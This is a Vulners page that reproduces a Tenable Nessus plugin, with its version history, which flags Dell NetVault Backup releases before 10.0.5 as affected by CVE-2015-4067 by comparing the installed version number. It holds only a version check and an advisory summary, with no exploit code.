Search...

Dell NetVault Backup 10.0.x < 10.0.5 RCE

2015-06-05T00:00:00

ID NETVAULT_CVE-2015-4067_REMOTE_HBOF.NASL
Type nessus
Reporter This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.
Modified 2019-11-02T00:00:00

Description

The Dell NetVault Backup installed on the remote host is version 10.0.x prior to 10.0.5. It is, therefore, affected by the following vulnerabilities :

A flaw exists in the libnv6 module due to an integer overflow condition. A remote attacker, by manipulating a serialized object

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(84006);
  script_cvs_date("Date: 2018/11/15 20:50:22");
  script_version("1.6");

  script_cve_id("CVE-2015-4067", "CVE-2015-5696");
  script_bugtraq_id(74841);
  script_xref(name:"EDB-ID", value:"37739");

  script_name(english:"Dell NetVault Backup 10.0.x &lt; 10.0.5 RCE");
  script_summary(english:"Checks the version of Dell NetVault.");

  script_set_attribute(attribute:"synopsis", value:
"The remote backup server is affected by a remote code execution
vulnerability.");
  script_set_attribute(attribute:"description", value:
"The Dell NetVault Backup installed on the remote host is version
10.0.x prior to 10.0.5. It is, therefore, affected by the following
vulnerabilities :

  - A flaw exists in the libnv6 module due to an integer
    overflow condition. A remote attacker, by manipulating a
    serialized object's template string specifiers, can
    exploit this to cause an overflow, resulting in a denial
    of service or the execution of arbitrary code.
    (CVE-2015-4067)

  - A denial of service vulnerability exists in nvpmgr.exe
    related to the handling of specially crafted strings,
    which a remote attacker can exploit to cause crash.
    (CVE-2015-5696)

Note that both of these issues may be caused by the same underlying
flaw and are both fixed by upgrading to the version specified by Dell.");
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-15-240/");
  # http://documents.software.dell.com/netvault-backup/10.0.5/release-notes/resolved-issues
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9ac90bf8");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Dell NetVault Backup 10.0.5 or later." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/05/26");
  script_set_attribute(attribute:"patch_publication_date", value:"2015/04/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/06/05");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe",value:"cpe:/a:dell:netvault_backup");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Gain a shell remotely");

  script_copyright(english:"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.");

  script_dependencies("netvault_detect.nasl");
  script_require_ports("Services/nvpmgr");

  exit(0);
}

include('audit.inc');
include('global_settings.inc');
include('misc_func.inc');

appname = "Dell NetVault";
port    = get_kb_item_or_exit("Services/nvpmgr");
nvver   = get_kb_item_or_exit("NetVault/"+port+"/NVVersion");
dispver = get_kb_item_or_exit("NetVault/"+port+"/DisplayVersion");
cover   = 10000;
if(report_paranoia &gt; 1)
  cover = 9000; 

# Versions 10.0.0+ &lt; 10.0.5
if(int(nvver) &gt;= cover && int(nvver) &lt; 10005)
{
  report = NULL;
  if(report_verbosity &gt; 0)
  {
    report =
      '\n  Installed version : ' + dispver +
      '\n  Fixed version     : 10.0.5.0'+
      '\n';
  }
  security_hole(port:port,extra:report);
  exit(0);
}
else
  audit(AUDIT_LISTEN_NOT_VULN, appname, port);

JSON Vulners Source

Initial Source

{"id": "NETVAULT_CVE-2015-4067_REMOTE_HBOF.NASL", "bulletinFamily": "scanner", "title": "Dell NetVault Backup 10.0.x < 10.0.5 RCE", "description": "The Dell NetVault Backup installed on the remote host is version\n10.0.x prior to 10.0.5. It is, therefore, affected by the following\nvulnerabilities :\n\n - A flaw exists in the libnv6 module due to an integer\n overflow condition. A remote attacker, by manipulating a\n serialized object", "published": "2015-06-05T00:00:00", "modified": "2019-11-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/84006", "reporter": "This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.", "references": ["http://www.nessus.org/u?9ac90bf8", "https://www.zerodayinitiative.com/advisories/ZDI-15-240/"], "cvelist": ["CVE-2015-5696", "CVE-2015-4067"], "type": "nessus", "lastseen": "2019-11-01T02:57:40", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:dell:netvault_backup"], "cvelist": ["CVE-2015-5696", "CVE-2015-4067"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "description": "The Dell NetVault Backup installed on the remote host is version\n10.0.x prior to 10.0.5. It is, therefore, affected by the following\nvulnerabilities :\n\n - A flaw exists in the libnv6 module due to an integer\n overflow condition. A remote attacker, by manipulating a\n serialized object", "edition": 9, "enchantments": {"dependencies": {"modified": "2019-10-28T20:44:21", "references": [{"idList": ["CVE-2015-5696", "CVE-2015-4067"], "type": "cve"}, {"idList": ["SECURITYVULNS:DOC:32428", "SECURITYVULNS:VULN:14652"], "type": "securityvulns"}, {"idList": ["1337DAY-ID-23986"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310806003", "OPENVAS:1361412562310805653"], "type": "openvas"}, {"idList": ["ZDI-15-240"], "type": "zdi"}, {"idList": ["PACKETSTORM:132928"], "type": "packetstorm"}, {"idList": ["EDB-ID:37739"], "type": "exploitdb"}]}, "score": {"modified": "2019-10-28T20:44:21", "value": 7.8, "vector": "NONE"}}, "hash": "3d831cd5b1727cc83d24407cab3a2c44acaad519ee20b59886ca66ba64d4f918", "hashmap": [{"hash": "83d85f0b2082533b5c390c185dd3e8ce", "key": "reporter"}, {"hash": "0bcde4285d440dd0277fbddbd871a913", "key": "cvelist"}, {"hash": "4c6596a131620cfc52eeb0f4043e32e9", "key": "published"}, {"hash": "e1f700955d13ca1dab21b2c172199d78", "key": "pluginID"}, {"hash": "55e5f61d4983f1c14216d056f7a03453", "key": "naslFamily"}, {"hash": "66a4c0be7110d2f08f781e6de7b728c0", "key": "description"}, {"hash": "dd6c22c984912e9791b24eda575f6056", "key": "title"}, {"hash": "7ffd93802a0e2fa26be01c6e6e50ae26", "key": "cpe"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "a9ea69fb49ab3ff68fb9ceae11de5f70", "key": "references"}, {"hash": "cf9b2eb1ee3344d7863a70b111a5b330", "key": "href"}, {"hash": "1ddbae8a812015dd761d4949281d0e6b", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/84006", "id": "NETVAULT_CVE-2015-4067_REMOTE_HBOF.NASL", "lastseen": "2019-10-28T20:44:21", "modified": "2019-10-02T00:00:00", "naslFamily": "Gain a shell remotely", "objectVersion": "1.3", "pluginID": "84006", "published": "2015-06-05T00:00:00", "references": ["http://www.nessus.org/u?9ac90bf8", "https://www.zerodayinitiative.com/advisories/ZDI-15-240/"], "reporter": "This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84006);\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n script_version(\"1.6\");\n\n script_cve_id(\"CVE-2015-4067\", \"CVE-2015-5696\");\n script_bugtraq_id(74841);\n script_xref(name:\"EDB-ID\", value:\"37739\");\n\n script_name(english:\"Dell NetVault Backup 10.0.x < 10.0.5 RCE\");\n script_summary(english:\"Checks the version of Dell NetVault.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote backup server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Dell NetVault Backup installed on the remote host is version\n10.0.x prior to 10.0.5. It is, therefore, affected by the following\nvulnerabilities :\n\n - A flaw exists in the libnv6 module due to an integer\n overflow condition. A remote attacker, by manipulating a\n serialized object's template string specifiers, can\n exploit this to cause an overflow, resulting in a denial\n of service or the execution of arbitrary code.\n (CVE-2015-4067)\n\n - A denial of service vulnerability exists in nvpmgr.exe\n related to the handling of specially crafted strings,\n which a remote attacker can exploit to cause crash.\n (CVE-2015-5696)\n\nNote that both of these issues may be caused by the same underlying\nflaw and are both fixed by upgrading to the version specified by Dell.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-15-240/\");\n # http://documents.software.dell.com/netvault-backup/10.0.5/release-notes/resolved-issues\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9ac90bf8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Dell NetVault Backup 10.0.5 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:dell:netvault_backup\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"netvault_detect.nasl\");\n script_require_ports(\"Services/nvpmgr\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nappname = \"Dell NetVault\";\nport = get_kb_item_or_exit(\"Services/nvpmgr\");\nnvver = get_kb_item_or_exit(\"NetVault/\"+port+\"/NVVersion\");\ndispver = get_kb_item_or_exit(\"NetVault/\"+port+\"/DisplayVersion\");\ncover = 10000;\nif(report_paranoia > 1)\n cover = 9000; \n\n# Versions 10.0.0+ < 10.0.5\nif(int(nvver) >= cover && int(nvver) < 10005)\n{\n report = NULL;\n if(report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + dispver +\n '\\n Fixed version : 10.0.5.0'+\n '\\n';\n }\n security_hole(port:port,extra:report);\n exit(0);\n}\nelse\n audit(AUDIT_LISTEN_NOT_VULN, appname, port);\n", "title": "Dell NetVault Backup 10.0.x < 10.0.5 RCE", "type": "nessus", "viewCount": 43}, "differentElements": ["modified"], "edition": 9, "lastseen": "2019-10-28T20:44:21"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:dell:netvault_backup"], "cvelist": ["CVE-2015-5696", "CVE-2015-4067"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The Dell NetVault Backup installed on the remote host is version 10.0.x prior to 10.0.5. It is, therefore, affected by the following vulnerabilities :\n\n - A flaw exists in the libnv6 module due to an integer overflow condition. A remote attacker, by manipulating a serialized object's template string specifiers, can exploit this to cause an overflow, resulting in a denial of service or the execution of arbitrary code.\n (CVE-2015-4067)\n\n - A denial of service vulnerability exists in nvpmgr.exe related to the handling of specially crafted strings, which a remote attacker can exploit to cause crash.\n (CVE-2015-5696)\n\nNote that both of these issues may be caused by the same underlying flaw and are both fixed by upgrading to the version specified by Dell.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "a226a89f2b38fbb9973bc1a5a181bea493a727fc8f40cdfc138ba8f1618c3fa0", "hashmap": [{"hash": "0bcde4285d440dd0277fbddbd871a913", "key": "cvelist"}, {"hash": "4c6596a131620cfc52eeb0f4043e32e9", "key": "published"}, {"hash": "a2aa9e3b884f4a96783c1c55cfb4e7b1", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e1f700955d13ca1dab21b2c172199d78", "key": "pluginID"}, {"hash": "55e5f61d4983f1c14216d056f7a03453", "key": "naslFamily"}, {"hash": "682fc71bfe0d793bfcde29c65b97e433", "key": "sourceData"}, {"hash": "3c3b127aed47a502fa2e6b9ff732d305", "key": "description"}, {"hash": "dd6c22c984912e9791b24eda575f6056", "key": "title"}, {"hash": "7ffd93802a0e2fa26be01c6e6e50ae26", "key": "cpe"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "4395952e0539c0ade337a4524a70675e", "key": "modified"}, {"hash": "e07de05eb023e2e0251a41ffc7f14baf", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=84006", "id": "NETVAULT_CVE-2015-4067_REMOTE_HBOF.NASL", "lastseen": "2018-08-30T19:36:54", "modified": "2018-07-16T00:00:00", "naslFamily": "Gain a shell remotely", "objectVersion": "1.3", "pluginID": "84006", "published": "2015-06-05T00:00:00", "references": ["http://www.nessus.org/u?9ac90bf8", "http://www.zerodayinitiative.com/advisories/ZDI-15-240/"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84006);\n script_cvs_date(\"Date: 2018/07/16 14:09:13\");\n script_version(\"1.5\");\n\n script_cve_id(\"CVE-2015-4067\", \"CVE-2015-5696\");\n script_bugtraq_id(74841);\n script_xref(name:\"EDB-ID\", value:\"37739\");\n\n script_name(english:\"Dell NetVault Backup 10.0.x < 10.0.5 RCE\");\n script_summary(english:\"Checks the version of Dell NetVault.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote backup server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Dell NetVault Backup installed on the remote host is version\n10.0.x prior to 10.0.5. It is, therefore, affected by the following\nvulnerabilities :\n\n - A flaw exists in the libnv6 module due to an integer\n overflow condition. A remote attacker, by manipulating a\n serialized object's template string specifiers, can\n exploit this to cause an overflow, resulting in a denial\n of service or the execution of arbitrary code.\n (CVE-2015-4067)\n\n - A denial of service vulnerability exists in nvpmgr.exe\n related to the handling of specially crafted strings,\n which a remote attacker can exploit to cause crash.\n (CVE-2015-5696)\n\nNote that both of these issues may be caused by the same underlying\nflaw and are both fixed by upgrading to the version specified by Dell.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-15-240/\");\n # http://documents.software.dell.com/netvault-backup/10.0.5/release-notes/resolved-issues\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9ac90bf8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Dell NetVault Backup 10.0.5 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:dell:netvault_backup\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"netvault_detect.nasl\");\n script_require_ports(\"Services/nvpmgr\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nappname = \"Dell NetVault\";\nport = get_kb_item_or_exit(\"Services/nvpmgr\");\nnvver = get_kb_item_or_exit(\"NetVault/\"+port+\"/NVVersion\");\ndispver = get_kb_item_or_exit(\"NetVault/\"+port+\"/DisplayVersion\");\ncover = 10000;\nif(report_paranoia > 1)\n cover = 9000; \n\n# Versions 10.0.0+ < 10.0.5\nif(int(nvver) >= cover && int(nvver) < 10005)\n{\n report = NULL;\n if(report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + dispver +\n '\\n Fixed version : 10.0.5.0'+\n '\\n';\n }\n security_hole(port:port,extra:report);\n exit(0);\n}\nelse\n audit(AUDIT_LISTEN_NOT_VULN, appname, port);\n", "title": "Dell NetVault Backup 10.0.x < 10.0.5 RCE", "type": "nessus", "viewCount": 22}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:36:54"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:dell:netvault_backup"], "cvelist": ["CVE-2015-5696", "CVE-2015-4067"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The Dell NetVault Backup installed on the remote host is version 10.0.x prior to 10.0.5. It is, therefore, affected by the following vulnerabilities :\n\n - A flaw exists in the libnv6 module due to an integer overflow condition. A remote attacker, by manipulating a serialized object's template string specifiers, can exploit this to cause an overflow, resulting in a denial of service or the execution of arbitrary code.\n (CVE-2015-4067)\n\n - A denial of service vulnerability exists in nvpmgr.exe related to the handling of specially crafted strings, which a remote attacker can exploit to cause crash.\n (CVE-2015-5696)\n\nNote that both of these issues may be caused by the same underlying flaw and are both fixed by upgrading to the version specified by Dell.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "b2d1d905172d5b6377bb4215ebfca4dc2ab8c49440f4d9d199b618cdfbfe00d5", "hashmap": [{"hash": "0bcde4285d440dd0277fbddbd871a913", "key": "cvelist"}, {"hash": "4c6596a131620cfc52eeb0f4043e32e9", "key": "published"}, {"hash": "a2aa9e3b884f4a96783c1c55cfb4e7b1", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e1f700955d13ca1dab21b2c172199d78", "key": "pluginID"}, {"hash": "55e5f61d4983f1c14216d056f7a03453", "key": "naslFamily"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "682fc71bfe0d793bfcde29c65b97e433", "key": "sourceData"}, {"hash": "3c3b127aed47a502fa2e6b9ff732d305", "key": "description"}, {"hash": "dd6c22c984912e9791b24eda575f6056", "key": "title"}, {"hash": "7ffd93802a0e2fa26be01c6e6e50ae26", "key": "cpe"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "4395952e0539c0ade337a4524a70675e", "key": "modified"}, {"hash": "e07de05eb023e2e0251a41ffc7f14baf", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=84006", "id": "NETVAULT_CVE-2015-4067_REMOTE_HBOF.NASL", "lastseen": "2018-07-18T13:48:53", "modified": "2018-07-16T00:00:00", "naslFamily": "Gain a shell remotely", "objectVersion": "1.3", "pluginID": "84006", "published": "2015-06-05T00:00:00", "references": ["http://www.nessus.org/u?9ac90bf8", "http://www.zerodayinitiative.com/advisories/ZDI-15-240/"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84006);\n script_cvs_date(\"Date: 2018/07/16 14:09:13\");\n script_version(\"1.5\");\n\n script_cve_id(\"CVE-2015-4067\", \"CVE-2015-5696\");\n script_bugtraq_id(74841);\n script_xref(name:\"EDB-ID\", value:\"37739\");\n\n script_name(english:\"Dell NetVault Backup 10.0.x < 10.0.5 RCE\");\n script_summary(english:\"Checks the version of Dell NetVault.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote backup server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Dell NetVault Backup installed on the remote host is version\n10.0.x prior to 10.0.5. It is, therefore, affected by the following\nvulnerabilities :\n\n - A flaw exists in the libnv6 module due to an integer\n overflow condition. A remote attacker, by manipulating a\n serialized object's template string specifiers, can\n exploit this to cause an overflow, resulting in a denial\n of service or the execution of arbitrary code.\n (CVE-2015-4067)\n\n - A denial of service vulnerability exists in nvpmgr.exe\n related to the handling of specially crafted strings,\n which a remote attacker can exploit to cause crash.\n (CVE-2015-5696)\n\nNote that both of these issues may be caused by the same underlying\nflaw and are both fixed by upgrading to the version specified by Dell.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-15-240/\");\n # http://documents.software.dell.com/netvault-backup/10.0.5/release-notes/resolved-issues\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9ac90bf8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Dell NetVault Backup 10.0.5 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:dell:netvault_backup\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"netvault_detect.nasl\");\n script_require_ports(\"Services/nvpmgr\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nappname = \"Dell NetVault\";\nport = get_kb_item_or_exit(\"Services/nvpmgr\");\nnvver = get_kb_item_or_exit(\"NetVault/\"+port+\"/NVVersion\");\ndispver = get_kb_item_or_exit(\"NetVault/\"+port+\"/DisplayVersion\");\ncover = 10000;\nif(report_paranoia > 1)\n cover = 9000; \n\n# Versions 10.0.0+ < 10.0.5\nif(int(nvver) >= cover && int(nvver) < 10005)\n{\n report = NULL;\n if(report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + dispver +\n '\\n Fixed version : 10.0.5.0'+\n '\\n';\n }\n security_hole(port:port,extra:report);\n exit(0);\n}\nelse\n audit(AUDIT_LISTEN_NOT_VULN, appname, port);\n", "title": "Dell NetVault Backup 10.0.x < 10.0.5 RCE", "type": "nessus", "viewCount": 22}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-07-18T13:48:53"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:dell:netvault_backup"], "cvelist": ["CVE-2015-5696", "CVE-2015-4067"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The Dell NetVault Backup installed on the remote host is version 10.0.x prior to 10.0.5. It is, therefore, affected by the following vulnerabilities :\n\n - A flaw exists in the libnv6 module due to an integer overflow condition. A remote attacker, by manipulating a serialized object's template string specifiers, can exploit this to cause an overflow, resulting in a denial of service or the execution of arbitrary code.\n (CVE-2015-4067)\n\n - A denial of service vulnerability exists in nvpmgr.exe related to the handling of specially crafted strings, which a remote attacker can exploit to cause crash.\n (CVE-2015-5696)\n\nNote that both of these issues may be caused by the same underlying flaw and are both fixed by upgrading to the version specified by Dell.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "b2d1d905172d5b6377bb4215ebfca4dc2ab8c49440f4d9d199b618cdfbfe00d5", "hashmap": [{"hash": "0bcde4285d440dd0277fbddbd871a913", "key": "cvelist"}, {"hash": "4c6596a131620cfc52eeb0f4043e32e9", "key": "published"}, {"hash": "a2aa9e3b884f4a96783c1c55cfb4e7b1", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e1f700955d13ca1dab21b2c172199d78", "key": "pluginID"}, {"hash": "55e5f61d4983f1c14216d056f7a03453", "key": "naslFamily"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "682fc71bfe0d793bfcde29c65b97e433", "key": "sourceData"}, {"hash": "3c3b127aed47a502fa2e6b9ff732d305", "key": "description"}, {"hash": "dd6c22c984912e9791b24eda575f6056", "key": "title"}, {"hash": "7ffd93802a0e2fa26be01c6e6e50ae26", "key": "cpe"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "4395952e0539c0ade337a4524a70675e", "key": "modified"}, {"hash": "e07de05eb023e2e0251a41ffc7f14baf", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=84006", "id": "NETVAULT_CVE-2015-4067_REMOTE_HBOF.NASL", "lastseen": "2018-09-01T23:42:28", "modified": "2018-07-16T00:00:00", "naslFamily": "Gain a shell remotely", "objectVersion": "1.3", "pluginID": "84006", "published": "2015-06-05T00:00:00", "references": ["http://www.nessus.org/u?9ac90bf8", "http://www.zerodayinitiative.com/advisories/ZDI-15-240/"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84006);\n script_cvs_date(\"Date: 2018/07/16 14:09:13\");\n script_version(\"1.5\");\n\n script_cve_id(\"CVE-2015-4067\", \"CVE-2015-5696\");\n script_bugtraq_id(74841);\n script_xref(name:\"EDB-ID\", value:\"37739\");\n\n script_name(english:\"Dell NetVault Backup 10.0.x < 10.0.5 RCE\");\n script_summary(english:\"Checks the version of Dell NetVault.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote backup server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Dell NetVault Backup installed on the remote host is version\n10.0.x prior to 10.0.5. It is, therefore, affected by the following\nvulnerabilities :\n\n - A flaw exists in the libnv6 module due to an integer\n overflow condition. A remote attacker, by manipulating a\n serialized object's template string specifiers, can\n exploit this to cause an overflow, resulting in a denial\n of service or the execution of arbitrary code.\n (CVE-2015-4067)\n\n - A denial of service vulnerability exists in nvpmgr.exe\n related to the handling of specially crafted strings,\n which a remote attacker can exploit to cause crash.\n (CVE-2015-5696)\n\nNote that both of these issues may be caused by the same underlying\nflaw and are both fixed by upgrading to the version specified by Dell.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-15-240/\");\n # http://documents.software.dell.com/netvault-backup/10.0.5/release-notes/resolved-issues\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9ac90bf8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Dell NetVault Backup 10.0.5 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:dell:netvault_backup\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"netvault_detect.nasl\");\n script_require_ports(\"Services/nvpmgr\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nappname = \"Dell NetVault\";\nport = get_kb_item_or_exit(\"Services/nvpmgr\");\nnvver = get_kb_item_or_exit(\"NetVault/\"+port+\"/NVVersion\");\ndispver = get_kb_item_or_exit(\"NetVault/\"+port+\"/DisplayVersion\");\ncover = 10000;\nif(report_paranoia > 1)\n cover = 9000; \n\n# Versions 10.0.0+ < 10.0.5\nif(int(nvver) >= cover && int(nvver) < 10005)\n{\n report = NULL;\n if(report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + dispver +\n '\\n Fixed version : 10.0.5.0'+\n '\\n';\n }\n security_hole(port:port,extra:report);\n exit(0);\n}\nelse\n audit(AUDIT_LISTEN_NOT_VULN, appname, port);\n", "title": "Dell NetVault Backup 10.0.x < 10.0.5 RCE", "type": "nessus", "viewCount": 24}, "differentElements": ["references", "modified", "sourceData"], "edition": 5, "lastseen": 